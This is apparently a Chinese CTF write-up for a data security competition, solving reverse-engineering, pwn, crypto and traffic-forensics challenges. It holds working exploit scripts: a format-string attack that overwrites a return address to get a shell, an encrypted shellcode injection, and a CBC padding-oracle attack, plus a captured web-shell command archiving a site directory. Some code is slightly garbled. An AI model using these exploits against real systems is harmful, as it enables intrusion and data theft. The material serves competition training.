-联合战队|共同成长-
为深入学习贯彻党的二十大精神,发掘数据安全人才,促进数据安全技术发展与应用,提升我国数据安全治理能力,护航数字中国建设,中国电子信息产业发展研究院、中国信息通信研究院、国家工业信息安全发展研究中心、中国软件评测中心(工业和信息化部软件与集成电路促进中心)联合举办第二届数据安全大赛暨首届“数信杯”数据安全大赛。本赛事为数据安全产业高峰论坛的重要组成部分。
Reverse
re_ds001
打开附件之后有一个密文文件和加密器
加密器放到ida里面
可以看到加密器首先将一个未加密的文件加载成buffer,之后将buffer传进加密函数里面,加密逻辑如下
简单来说,首先进行了一次base64加密,之后进行了一次自定义逻辑加密
自定义逻辑是
左移右移之后,数据不会丢失,所以直接逆向即可
#include<stdio.h>
#include<windows.h>
int main()
{
char a2[] = { 0x6a,0x53,0x2a,0xd3,0x6a,0xa2,0x8a,0xd3,0x72,0x22,0xca,0x91,0x6a,0x53,0xca,0x3b,0x7a,0x22,0x4a,0x91,0x6a,0x53,0x3b,0x99,0x6a,0x53,0x0a,0xc3,0x6a,0x22,0x4a,0xd3,0x6a,0x53,0x1b,0xa9,0x72,0xd3,0x2a,0xa1,0x4a,0x22,0x32,0x53,0xd2,0xba,0x8a,0xbb,0x6a,0xaa,0x0a,0xc3,0xca,0xcb,0xa9,0x53,0x13,0x91,0x81,0x5a,0x6a,0x53,0x2a,0xc3,0x6a,0x53,0xaa,0x89,0x6a,0x53,0xaa,0xcb,0x6a,0x22,0x2a,0x3b,0x7a,0x22,0x1b,0x91,0x6a,0x22,0xaa,0x81,0x6a,0xa2,0x5b,0x91,0x72,0x22,0x4a,0xc3,0x6a,0xa2,0x1b,0xa1,0x6a,0x22,0x43,0xca,0x4a,0x3a,0xb2,0x53,0x6a,0x22,0x3b,0x99,0x72,0xa2,0x72,0x0a,0x72,0x3a,0x72,0x4b,0x6a,0x4b,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0xca,0x91,0x6a,0xa2,0x4a,0xbb,0x72,0xd3,0xca,0x81,0x6a,0x53,0x1b,0x3b,0x72,0xd3,0x3b,0xa9,0x6a,0xa2,0x5b,0xcb,0x6a,0xa2,0x5b,0x91,0x72,0xa2,0x4a,0x91,0x6a,0x22,0xca,0xa9,0x6a,0x53,0x6a,0xa9,0x4a,0x3a,0x72,0x53,0xca,0x53,0x6a,0x91,0x7a,0x3a,0xaa,0xa1,0x8a,0x3a,0xca,0xa1,0x7a,0xa2,0x2a,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0x2a,0xcb,0x6a,0xa2,0x2a,0x91,0x6a,0xd3,0xca,0x99,0x6a,0x53,0xca,0x3b,0x7a,0x22,0x1b,0x89,0x72,0x53,0xaa,0x99,0x6a,0xa2,0x5b,0x99,0x72,0xa2,0x4a,0xa9,0x6a,0xa2,0x3b,0xa9,0x6a,0x53,0x5b,0x91,0x4a,0x22,0xca,0x81,0x7a,0x3a,0x8a,0xcb,0xd2,0x22,0x12,0x0a,0x6a,0x3a,0x8a,0x91,0xd2,0x4b,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0x89,0x6a,0xa2,0xaa,0xa1,0x72,0xd3,0xca,0x81,0x72,0xa2,0xaa,0x3b,0x7a,0xa2,0x1b,0x99,0x6a,0xa2,0xca,0xd3,0x6a,0x53,0x0a,0xc3,0x72,0xd3,0x4a,0xc3,0x6a,0x22,0x1b,0x91,0x7a,0xa2,0x4a,0xd3,0x4a,0x22,0x8a,0xa9,0xca,0xd3,0x92,0x43,0x72,0x5b,0x0a,0xa1,0x72,0xba,0xca,0xa1,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0x53,0xaa,0xa1,0x6a,0x53,0x0a,0xa1,0x72,0x53,0xaa,0xa1,0x6a,0x22,0x5b,0x3b,0x72,0xd3,0xaa,0xa1,0x7a,0xa2,0x3b,0x91,0x6a,0xa2,0x5b,0x89,0x7a,0xa2,0x4a,0x81,0x6a,0xa2,0x5b,0xa1,0x6a,0xa2,0x52,0xca,0x4a,0x22,0x8a,0x81,0xd2,0x53,0x5b,0xc3,0xca,0xba,0xb2,0x0a,0xca,0xba,0x4a,0xd3,0xd2,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0xca,0x99,0x6a,0x53,0x2a,0xc3,0x72,0x22,0xaa,0xa1,0x6a,0x22,0x1b,0x3b,0x7a,0xa2,0x8a,0xa9,0x6a,0xd3,0xca,0xa9,0x6a,0xa2,0x5b,0xa9,0x7a,0xa2,0x4a,0x91,0x6a,0x22,0xaa,0x99,0x7a,0xa2,0x1b,0x89,0x4a,0x22,0x43,0x43,0xca,0xa2,0x1b,0xa9,0x6a,0xa2,0xd2,0x0a,0xd2,0xa2,0xca,0xa9,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0x5b,0xc3,0x6a,0x53,0xca,0x81,0x7a,0x22,0x6a,0x3b,0x72,0xd3,0xca,0x91,0x72,0x53,0x5b,0x89,0x6a,0xa2,0x5b,0x89,0x72,0x53,0x4a,0x99,0x6a,0x22,0x1b,0x99,0x6a,0x53,0x4a,0x89,0x4a,0x22,0xaa,0xa9,0x72,0xa2,0x1b,0xcb,0x6a,0x2a,0x0a,0x91,0xd2,0xa2,0xca,0xbb,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0xa2,0x6a,0xd3,0x6a,0x53,0xaa,0xa9,0x6a,0x53,0x6a,0x3b,0x72,0xd3,0xca,0xa9,0x72,0x53,0xaa,0x89,0x6a,0xa2,0x5b,0x89,0x6a,0x53,0x4a,0x81,0x6a,0x53,0x1b,0xa1,0x6a,0xd3,0xca,0x91,0x4a,0x22,0x92,0x6b,0xca,0xba,0x72,0x43,0x72,0x5b,0x12,0x53,0xca,0x91,0x4a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0xca,0x99,0x6a,0xa2,0x1b,0xcb,0x7a,0xa2,0xaa,0xa1,0x6a,0x22,0x4a,0x3b,0x72,0xd3,0x2a,0xa9,0x6a,0xa2,0xaa,0x89,0x6a,0xa2,0x5b,0x91,0x72,0xd3,0x4a,0x89,0x6a,0x22,0x1b,0x91,0x6a,0x53,0x6a,0x81,0x4a,0x22,0x12,0x5b,0xca,0x53,0x3b,0x99,0x7a,0xa2,0x5b,0xc3,0x8a,0x3a,0x4a,0x99,0x72,0x1a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xaa,0x91,0x6a,0xa2,0xaa,0xcb,0x6a,0xd3,0xaa,0x89,0x6a,0x53,0x6a,0x3b,0x72,0xd3,0x0a,0xa9,0x72,0x22,0xaa,0xd3,0x6a,0xa2,0x5b,0x91,0x6a,0xd3,0x4a,0x81,0x6a,0xa2,0xca,0x99,0x72,0x53,0x5b,0xa1,0x4a,0x22,0x0a,0xa1,0x6a,0x6b,0x72,0x53,0x72,0xa2,0x43,0x0a,0x72,0x3a,0x8a,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0x89,0x6a,0x53,0x3b,0xa9,0x6a,0x53,0xaa,0xc3,0x72,0xa2,0x8a,0x3b,0x72,0xd3,0x6a,0x91,0x72,0x22,0xca,0xd3,0x6a,0xa2,0x5b,0xa9,0x72,0xa2,0x4a,0xa1,0x6a,0xa2,0x0a,0xa1,0x7a,0xa2,0x1b,0xc3,0x4a,0x3a,0x8a,0xbb,0x72,0xba,0x92,0x6b,0xca,0xaa,0x12,0x4b,0x72,0x6b,0x72,0x63,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0x6a,0xd3,0x6a,0x53,0xaa,0xa9,0x7a,0xa2,0x2a,0x3b,0x7a,0x22,0x5b,0x99,0x72,0x22,0x3b,0xa9,0x6a,0xa2,0x5b,0x99,0x6a,0xd3,0x4a,0x99,0x6a,0xa2,0x5b,0x99,0x72,0xd3,0x4a,0xa1,0x4a,0x22,0xb2,0x6b,0xca,0xa2,0x0a,0xd3,0xca,0x81,0x12,0x5b,0xd2,0x6b,0x2a,0x81,0x62,0x6b,0x72,0xb3,0x13,0x9a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0xaa,0x91,0x6a,0xa2,0x5b,0xbb,0x6a,0xa2,0xca,0x91,0x72,0xa2,0x3b,0x3b,0x7a,0x22,0xaa,0x91,0x7a,0x22,0x3b,0x89,0x6a,0xa2,0x5b,0x91,0x72,0x53,0x4a,0x81,0x6a,0x22,0x5b,0xa1,0x7a,0xa2,0x6a,0xbb,0x4a,0x22,0xd2,0x4b,0xca,0xd3,0x72,0x63,0xd2,0x5b,0x0a,0x91,0x72,0x1a,0xa9,0x53,0x13,0x3b,0x7b,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0xa2,0x1b,0x99,0x72,0xd3,0xca,0x91,0x72,0xd3,0x2a,0x3b,0x72,0xd3,0xaa,0x89,0x72,0x22,0x1b,0xc3,0x6a,0xa2,0x5b,0xa1,0x6a,0xa2,0x4a,0x91,0x6a,0x53,0xaa,0xa1,0x72,0x22,0x4a,0xcb,0x4a,0x22,0x5b,0x81,0x72,0x53,0x4a,0xbb,0xd2,0xba,0x72,0x0a,0xca,0x53,0x2a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0xaa,0xa1,0x6a,0x53,0xca,0xa1,0x7a,0x22,0xca,0xd3,0x7a,0xa2,0xaa,0x3b,0x72,0xd3,0x5b,0x91,0x72,0x53,0x5b,0xcb,0x6a,0x53,0x0a,0xc3,0x72,0x22,0x6a,0xbb,0x6a,0x22,0x6a,0xa1,0x6a,0x22,0x2a,0x91,0x4a,0x22,0x43,0x6b,0x6a,0x22,0x23,0x5b,0x72,0x53,0x52,0x0a,0x7a,0x3a,0x2a,0xab,0xca,0x91,0xc9,0xa3,0x1a,0x3b,0xe9,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0x53,0x1b,0x91,0x7a,0x22,0xca,0x89,0x7a,0x22,0x5b,0x3b,0x72,0xd3,0x5b,0x89,0x72,0xd3,0x3b,0xc3,0x6a,0xa2,0x5b,0x91,0x72,0xd3,0x6a,0xbb,0x6a,0x53,0x0a,0x89,0x7a,0x22,0x8a,0xcb,0x4a,0x3a,0x52,0x6b,0x72,0x53,0xaa,0xc3,0x7a,0xaa,0x12,0x4b,0xd2,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0x53,0xca,0xa1,0x6a,0x53,0x4a,0x91,0x72,0xa2,0xaa,0xd3,0x6a,0x22,0xca,0x3b,0x7a,0xa2,0x4a,0xa9,0x6a,0x53,0x3b,0xa1,0x6a,0x53,0x0a,0xc3,0x6a,0xa2,0x4a,0xcb,0x6a,0xa2,0x4a,0x91,0x72,0xa2,0xca,0xa1,0x4a,0x22,0x0a,0xa9,0x6a,0x3a,0x4a,0xa9,0xca,0x53,0x43,0x0a,0x6a,0x6b,0x2a,0x89,0x6a,0x9a,0xa9,0x53,0x13,0x91,0x81,0xab,0xca,0x91,0xa1,0x5a,0x6a,0xd3,0x2a,0xd3,0x6a,0xa2,0x8a,0x99,0x72,0xd3,0xca,0xc3,0x72,0xd3,0x4a,0x3b,0x72,0xd3,0xaa,0x99,0x6a,0xa2,0xaa,0x99,0x6a,0xa2,0x5b,0xa9,0x6a,0x22,0x4a,0xd3,0x6a,0x53,0x6a,0x89,0x72,0x53,0x2a,0xa1,0x4a,0x3a,0x92,0x43,0x6a,0x22,0x0a,0x81,0x7a,0x22,0x0a,0xa9,0x8a,0x22,0x5b,0xc3,0x62,0x6b,0x72,0xb3,0x13,0x8a,0x7b,0xe9,0x6a,0xd3,0x2a,0xcb,0x6a,0xa2,0x5b,0x89,0x72,0x22,0xaa,0xc3,0x72,0xa2,0x4a,0x3b,0x7a,0xa2,0xca,0xa1,0x7a,0x22,0xaa,0xa9,0x6a,0xa2,0x5b,0x91,0x6a,0x22,0x4a,0x89,0x6a,0x22,0x1b,0x89,0x72,0xa2,0xaa,0x89,0x4a,0x22,0x23,0x43,0x6a,0x53,0xaa,0xc3,0x8a,0x22,0x0a,0xa9,0xd2,0xa2,0x6a,0xab,0xca,0x91,0xa1,0x5a };
int result; // rax
unsigned int v4; // [rsp+24h] [rbp+4h]
int i; // [rsp+44h] [rbp+24h]
v4 = strlen(a2);
for (i = 0; ; ++i)
{
result = v4;
if (i >= (int)v4)
break;
a2[i] = (32 * a2[i]) | ((int)(unsigned __int8)a2[i] >> 3);
}
printf("%s", a2);
return 0;
}
得到的base64编码解密即可
re_ds002
RC4+异或
调试获得密钥key,6A1D4E2a2276Y7JL
异或的密钥276Y7JB6A1D4E2A2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define N 256
//定义S-box S[256]
unsigned char S[N];
//初始化S-box中的256个字节,key是加密密钥
void Init_Sbox(unsigned char* key, int key_len)
{
int i = 0, j = 0;
unsigned char tmp = 0;
//先将S[256]填充为空
for (i = 0; i < N; i++)
S[i] = i;
//用key填充S[256]
for (i = 0; i < N; i++)
{
j = (j + S[i] + key[i % key_len]) % 256;
tmp = S[i];
S[i] = S[j];
S[j] = tmp;
}
}
//RC4加密函数
void Encrypt(unsigned char* Data, int DataByte, unsigned char* Key, int KeyLen)
{
int i = 0, j = 0, t = 0;
unsigned char tmp;
Init_Sbox(Key, KeyLen);
for (t = 0; t < DataByte; t++)
{
i = (i + 1) % 256;
j = (j + S[i]) % 256;
tmp = S[i];
S[i] = S[j];
S[j] = tmp;
Data[t] ^= S[(S[i] + S[j]) % 256];
}
}
//RC4解密函数
void Decrypt(unsigned char* Data, int DataByte, unsigned char* Key, int KeyLen)
{
int i = 0, j = 0, t = 0;
unsigned char tmp;
Init_Sbox(Key, KeyLen);
for (t = 0; t < DataByte; t++)
{
i = (i + 1) % 256;
j = (j + S[i]) % 256;
tmp = S[i];
S[i] = S[j];
S[j] = tmp;
Data[t] ^= S[(S[i] + S[j]) % 256];
}
}
//RC4加密/解密主函数
int main()
{
//定义数据、密钥及其有效长度
// 文件路径
const char* filePath = "D:\Download\re_ds002\en_file_data.enf2";
// 创建一个足够大的数组来存储数据
unsigned char data[2048]; // 假设文件大小不超过1024字节
unsigned char data1[2048];
// 打开文件
FILE* file = fopen(filePath, "rb"); // 以二进制模式读取
// 从文件中读取数据到数组data中
size_t bytesRead = fread(data, sizeof(unsigned char), sizeof(data), file);
unsigned char key[] = "6A1D4E2a2276Y7JL";
unsigned char xor_key[] = "276Y7JB6A1D4E2A2";
int keyLen = 16;
int dataLen = strlen((char*)data);
for (int i = 0; i < dataLen; i++)
{
data1[i] = data[i] ^ (xor_key[i % keyLen]);
}
//解密
Decrypt(data1, dataLen, key, keyLen);
printf("解密后 : %sn", data);
return 0;
}
解密得 : 35819955202 855981200427146647 821[email protected]
PWN
pb
就是简单的bss上的格式化字符串漏洞
exp
from pwn import *
import base64
#p=process('./pb')
p=remote('106.15.53.199',32939)
context.clear(arch='amd64', os='linux', log_level='debug')
libc=ELF('./libc-2.23.so')
main=0x4011D6
one_addr=[0x45226,0x4527a,0xf03a4,0xf1247]
p.sendafter(b'How to do?n',b'%13
$p-%11$
p')
stack=int(p.recv(14),16)
stack_ret=stack-0xe0
log.info(hex(stack_ret))
p.recvuntil(b'-')
libc_base=int(p.recv(14),16)-0xf0-libc.sym['__libc_start_main']
log.info(hex(libc_base))
one=libc_base+one_addr[0]
log.info(hex(one))
one1=one&0xffff
one2=(one>>16)&0xffff
one3=(one>>32)&0xffff
pay=b'%'+str(stack_ret&0xffff).encode()+b'c%13$hn'
p.sendlineafter(b'How to do?n',pay)
pay=b'%'+str(one1).encode()+b'c%39$hn'
p.sendlineafter(b'How to do?n',pay)
pay=b'%'+str((stack_ret&0xff)+2).encode()+b'c%13$hhn'
p.sendlineafter(b'How to do?n',pay)
pay=b'%'+str(one2).encode()+b'c%39$hn'
p.sendlineafter(b'How to do?n',pay)
pay=b'x00'*0x20
p.sendlineafter(b'How to do?n',pay)
p.interactive()
aesc
Ida分析程序,存在一个call rax影响反汇编,直接patch掉,然后大概修复一下符号
之后对-后面的输入进行了处理,这里从插件可以看出来是aes
之后nop掉的call rax就是直接调用处理后的代码,而对于aes加密,key和iv分别为
找一段shellcode进行加密
尝试过之后发现不行,重新调试程序,发现解密数据不一致
分析加密过程可能有问题,调试发现key值会发生变化
重新解密
编写脚本getshell
from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
p = remote('XXXX',XXXX)
#p = process('./aesc')
#gdb.attach(p)
sc = 'x15xa0xcbxc8x52xbexf0x45x07x0cx44x89x89x81x16xe9x2ax0bx0exfax6bxeex2cxb8x4dxc5x5ax11xa8x18x61xb5'
payload = '-' + sc
p.sendline(payload)
p.interactive()
Crypto
Homooo0
crypto1部分是简单的lcg,这里直接使用grobener基求解线性关系,得到初始seed
crypto2部分是rsa给出了hint,考虑到hint = 114514^p mod q,由费马小定理知hint = 114514^p*q = 114514^n mod q,因此利用hint - pow(114514, n, n)与n求解gcd即可将n分解,得到的m是一个素因子列表,直接乘起来得到m2的值
综上将两部分flag拼接即可
from Crypto.Util.number import *
output = [379940911379953190738065211329880704968887929, 1872252095018294289102935465830666339134562151, 2218420719930619226319067546293478252242226458, 1579245444542904364875305481053943269743008549, 425392941117051285074706333070389609337530919, 657262378722139347423806179198617363063641535, 1461082838700350967433433211657342782936632658, 963751022151998652319872980044981590997051383, 1468468649834237142138916241795639564731929858, 894951290310162231498227170019052662901900106]
c = [5594765398895254497475390005515035165284947269482621212797364461116118828373030713653343829517676098247766810734167082486320857300603497577126713934378631060263065549510925849452528953404897544331443373022878004161177239661074098696364576450610303462705901680927031776827241380806829975994477307763410387909849663818842612816513488815063929788914749765715654361270374094951946698052421257227130710582004663667946833787782867142583952786583258460025201945224218183297310523389883123924792764297581896221795545651600004193837672786769087836697122181260018470054181076950975180483722573191259610507703805083959748628702, 18354543892431468698051144351651509749609506353214260811499577221908719283970286249536025926103536722940677113931335836508600695671820419801339342934435824515029299213790359041072360311512713705204002804129104738605964805164147722668894577827936326360814641394531203766344090798761628574626073504837365777460022073776704625251119419114486020315822475782336836237181108506820141633065828442597864716912066844670995455789274666742612665339577335803474044601225393448472601258235054542532455930028493965300794639477366773043061387713356068617705172707244145519119460068276515218619768447370748404523475940126401735202713, 13067613292114365350832630357309256892205092736734498409599614557765145853213115110662215358087327035294859139102830299174883445763972793544660067341892396813727940202103078616429693114912767222364824981525469897822258269033546395674755328159714895802743220805620518021794872638495366176488936655825440565962246474060922000652065256442083838487804427651100248697232018323068320537887588811670359374924969088709306632891312225283192959820408780025359635753658073155641892772680155573265995988033807925485674328357800451476663801518626815179947020769967024502712000390664616369855288447076430583396317901868635670903116, 1970246464981582185079840308342735335756570281528051357081434733605120075805108626175190939428222607679594440560718696113780016317501300998689452986221340709539874390866027325399105690522914912573749101268828961339899528345351602783733709690435381749900678529472260068811603241699935312502099438047447306331357922551536595737577778748471614413662779347020098023845496542068130118804519461892845097834511960310899125700074564461627049111870520851339107312207939096802549130703012532791227081366939019573591861482505143545888091035625734830537575454122259156021272985568985231430666257475902788787851476741010590326796, 4790816369832644851013897396728451410603728845552047537461048213879599460860175754611778658469205466634464899690642512890640661282818232275974631154994300419771468298485497765937356667986209597926878867976087643208326859946748594585252359978987853991823440517117397399904923756242431741811540597482789716480873515811069162424083734824293917807033645119197175733111304137346440353394724292956442109722691111714269187897648996544169031722249416188817927438327053576322823860564997328322821310219755433667926629085898372372888612204240167051221066348207037067965641711907104335671740191330077770626646796483577466922248, 10814650073087646346270245700026520419052331614597670711170052995832396418767254831061783825732111951302617190609152386041063604227098960001222048116476448947363754273135043354765054048027259775479829994840608711993723541933400421406020697924870102262125774838260456598741580451631667066129474067717793740121714362269552616426983298596223194062472856768981086359085984098225437548540851003103040245764298690834662920035848986451312155517111160676356001420773607652602890064569225611459892163774585206246082361752026359493618236053535568190870389696937273946530288300181042259976780219925540591411434092069627883521589, 17402258954583488899599077875782027692814099559940479055525715762308830292235828750274185447227093065906070741087056217439270030178529425666725470935320279585193413061911905402574473777027930507657670738102107008346656342925219094002445305706707695127526264448650657730801617264050097681327920107643154875069903297863683695217043121156225988854486200063498737759655924544668396741940750710151762056520992169228339196998725270006421679000430454557238994456964289263448493696220664760793673504610614794211760802780170221872766315614543591333048919946041272764838123984938843359468141442427857124108190855973548328439926]
hint = 16536285698408033188775970487002941871169646202054607075951261488252097050309959670888933647846979074234584091138294883295283655541922856105993430306089873050060823509469357653401611918358566181439207815795998432610088842959371420010593544007396878166928172572144613158071036940284924703911208736953641513236511987794121581605651025684223709898943350403042639624699485398601383308932061389249410713498575347849561123663911884193305584505859244156315903617357265674661399461569230410041997758445531606306507143956677733117597303102381050916764758656179521304902624285341437654760783955965761612971416984285177511972228
nn = 19146983551664702060097078821426397203936212633777978682169745838218120832974862357336060768023474701750459368454997765226576109516138124664705940970181884796090592025651687775377728753164334513191345754283706072450646288900663093945490502996638972998794132230852304097134994455627812996399122597839583024961826405525483276237662432278877829029168335844813894826246108076898652707988498096786814212257013685653982180235692189470315387649986765521900124337240432936201152716716736430994451736935879749385513107827824716135665305803700117296657477498198789850697139445575999541700057404516418222716008859942060344247147
R.<a, b, s> = ZZ[]
Fs = list()
for i in range(len(output)):
s = a*s + b
Fs.append(s - output[i])
B = Ideal(Fs).groebner_basis()
m = ZZ(B[-1])
s = ZZ(-B[2].univariate_polynomial()(0) % m)
m1 = long_to_bytes(s)
q = GCD(nn, hint-ZZ(pow(114514, nn, nn)))
p = nn // q
d = inverse_mod(65537, nn-p-q+1)
m2 = prod([ZZ(pow(ci, d, nn)) for ci in c])
m2 = long_to_bytes(m2)
print(m1 + m2)
# b'flag{ad24537876ed7f4fccbc7d9f7ca7c473}'
AESsystem
AES的cbc padding oracle
from pwn import *
#io = process('./server.py')
io = remote('XXXX',XXXX)
io.sendlineafter(b'Please enter your job name:n', b'0'*15)
io.sendlineafter(b'** Give your choice: n', b'1')
enc_flag = bytes.fromhex(io.recvline().strip().decode())
iv, enc_flag = enc_flag[:16], enc_flag[16:]
flag = b''
for b in range(0, len(enc_flag), 16):
block = enc_flag[b:b+16]
suffix = b''
for i in range(16):
now = xor(suffix, bytes([i+1])*len(suffix))
for c in range(256):
payload = (bytes([c]) + now).rjust(16, b'x00') + block
io.sendlineafter(b'** Give your choice: n', b'3')
io.sendlineafter(b'* Please input your message(hex):n', payload.hex().encode())
res = io.recvline()
if b'failed' in res:
continue
suffix = bytes([c ^ (i + 1)]) + suffix
break
else:
io.close()
print(b, i)
print("not this time")
exit()
flag += xor(iv, suffix)
iv = block
print(flag)
io.interactive()
数据分析
数据分析1
明显为ftp流量,跟踪得到用户名和密码,md5后即为flag
ftp+admin+admin123
导出ftp-data对象得到,md5后即为flag
101+key
拼图脚本
from PIL import Image
# 创建一个空白的400x400图
result_image = Image.new('RGB', (400, 400))
# 循环遍历100张图片
for i in range(1, 101):
# 打开第i张图片
image_path = f"./{i}.png"
image = Image.open(image_path)
# 将图片调整为400x4大小
image = image.resize((400, 4))
# 计算当前图片在拼接图像中的位置
y = (i - 1) * 4
# 将当前图片粘贴到拼接图像中的对应位置
result_image.paste(image, (0, y, 400, y + 4))
# 保存拼接后的图像
result_image.save("./result_image.png")
猫变换脚本
#coding=utf-8
import cv2
from PIL import Image
import numpy as np
shuffle_times = 1
a = 0x6f6c53
b = 0x729e
def arnold_decode(image, shuffle_times, a, b):
""" decode for rgb image that encoded by Arnold
Args:
image: rgb image encoded by Arnold
shuffle_times: how many times to shuffle
Returns:
decode image
"""
# 1:创建新图像
decode_image = np.zeros(shape=image.shape)
# 2:计算N
h, w = image.shape[0], image.shape[1]
N = h # 或N=w
# 3:遍历像素坐标变换
for time in range(shuffle_times):
for ori_x in range(h):
for ori_y in range(w):
# 按照公式坐标变换
new_x = ((a*b+1)*ori_x + (-a)* ori_y)% N
new_y = ((-b)*ori_x + ori_y) % N
decode_image[new_x, new_y] = image[ori_x, ori_y]
return decode_image
img = cv2.imread('flag1.png')
flag = arnold_decode(img, shuffle_times, a, b)
cv2.imwrite('./res1.png',flag)
得到二维码后,zsteg得到base64,解密即为flag
flag{3f3c1b49504191faf6576866f99806cd}
数据分析3
post过滤,找到用户名和密码
admin:admin@QWEzxc
通过thekey过滤,得到
D124759C42CDF90C
解密返回包,得到数据库的用户名和密码
webuser:1q2w3e4r5t6y
数据分析5
搜索张三,找到加密的身份证数据,C740DE421B66E88AEB080FC4F9CA5198650633861AB15C0DE28AB85030427F15,弱口令aes解密得到身份证
420116194503103216
4825376109164835
在请求包中找到压缩包的密码
cd /d "E:phpstudy_proWWWwwwCT"&"C:/Program Files/7-Zip/7z.exe" a -pshuanqq1234 ct.zip ./&echo 514f89&cd&echo b3d11fb9bc74
导出压缩包,解压得到一堆医疗影像图,找到张三的影像图另存为png
在blue的0通道找到flag
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论